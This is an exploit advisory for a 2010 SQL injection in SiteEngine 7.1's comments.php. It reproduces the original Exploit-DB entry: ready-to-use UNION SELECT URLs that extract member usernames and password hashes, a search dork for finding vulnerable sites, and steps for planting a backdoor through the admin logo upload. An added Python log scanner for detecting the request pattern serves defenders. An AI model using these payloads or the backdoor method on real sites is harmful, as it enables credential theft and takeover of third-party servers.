Vendor: SiteEngine
By: Beach
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: SiteEngine
Affected Version From: 7.1
Affected Version To: 7.1
Patch Exists: NO
Related CWE: N/A
CPE: a:siteengine:siteengine:7.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
Year: 2010

SiteEngine 7.1 SQL injection Vulnerability

Exploiting this vulnerability requires the comment feature to be enabled (it is enabled by default). The injection is carried in the module parameter of comments.php.

Enterprise Portal Version:
http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23
http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23

E-commerce Version:
http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23

Upload backdoor: Administrator Panel: http://server/admin/ System maintainance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> Browse Right Now -> view properties [the URL shown is the backdoor].

Mitigation:

Ensure that the comment feature is disabled by default and enabled only when necessary.
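
A detection check for the request pattern described above, as an added example that is not part of the original advisory or of SiteEngine: it scans web-server access logs for comments.php requests whose module parameter is anything other than a plain identifier. The log lines are constructed, and the rule that a legitimate module value is a short identifier such as news is an assumption, not vendor documentation.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate module value is one short identifier such as "news".
SAFE_MODULE = re.compile(r"[A-Za-z0-9_]{1,32}")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges). The second request
# reuses the E-commerce URL quoted in the advisory, elision included.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Nov/2010:10:01:02 +0000] '
    '"GET /comments.php?id=1&module=news HTTP/1.1" 200 5120',
    '198.51.100.23 - - [25/Nov/2010:10:03:40 +0000] '
    '"GET /comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union'
    '+select+1,2,password,4,5,6,...,37,38+from+boka_members%23 HTTP/1.1" 200 7311',
    '203.0.113.7 - - [25/Nov/2010:10:04:10 +0000] '
    '"GET /index.php?module=news+x HTTP/1.1" 200 900',
]


def suspicious_module_requests(log_lines):
    """Return (client_ip, decoded_module) for each comments.php request whose
    module parameter is not a plain identifier."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/comments.php"):
            continue
        # parse_qs percent-decodes and maps '+' to space, so the check sees
        # the value the application would receive.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("module", []):
            if not SAFE_MODULE.fullmatch(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, module in suspicious_module_requests(SAMPLE_LOG):
        print(f"{ip} sent non-identifier module value: {module!r}")
```

Access logs record only the query string, so a module value sent in a POST body would need request-body logging to be caught by this check.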

Exploit-DB raw data:

#################################################################################
#Title:   SiteEngine 7.1 SQL injection Vulnerability
#Date:    2010-11-25
#Author:  Beach
#Team:    www.linux520.com
#Vendor:  www.siteengine.net  www.boka.cn
#Dork:    "Powered by SiteEngine"   //300,000 +~
#Language:PHP
#Greetz:  birdarmy
#################################################################################
[*]Description:
   To exploit this vulnerability, comment must be enabled (default == enable)
#################################################################################
[*]Exploit:

Enterprise Portal Version:
[1]http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23

[2]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23

May have a different number of columns, you can try it ...
==================================================================================
E-commerce Version:

[+]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23
##################################################################################

Similar to other versions  =)
##################################################################################
[*]Upload backdoor:
Administrator Panel: http://server/admin/

System maintainance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> 
Browse Right Now -> view properties [the URL is Ur backdoor]
##################################################################################